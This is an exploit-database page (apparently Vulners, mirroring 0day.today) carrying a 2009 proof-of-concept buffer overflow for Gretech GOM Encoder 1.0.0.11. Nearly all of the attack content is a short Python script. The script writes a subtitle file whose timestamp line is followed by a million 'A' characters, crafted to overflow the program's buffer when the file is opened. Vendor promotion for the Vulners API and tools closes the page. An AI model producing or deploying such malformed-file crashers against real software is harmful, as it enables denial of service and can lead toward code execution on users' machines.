Lucene search
K

Gretech GOM Encoder 1.0.0.11 (Subtitle File) Buffer Overflow PoC

🗓️ 16 Mar 2009 00:00:00Reported by Encrypt3d.M!ndType 
zdt
 zdt
🔗 0day.today👁 23 Views

Gretech GOM Encoder 1.0.0.11 Buffer Overflow PoC for Subtitle Fil

Code
================================================================
Gretech GOM Encoder 1.0.0.11 (Subtitle File) Buffer Overflow PoC
================================================================




#exploit.py
#
# Gom Encoder (Subtitle File) Buffer Overflow PoC
# by :Encrypt3d.M!nd
#
#

chars = 'A' * 1000000

file = open ( 'devil_inside.srt', 'w' )
file.write ('1\n00:00:00,001 --> 00:00:06,000\n'+chars)
file.close()



#  0day.today [2017-12-31]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

16 Mar 2009 00:00Current
7High risk
Vulners AI Score7
23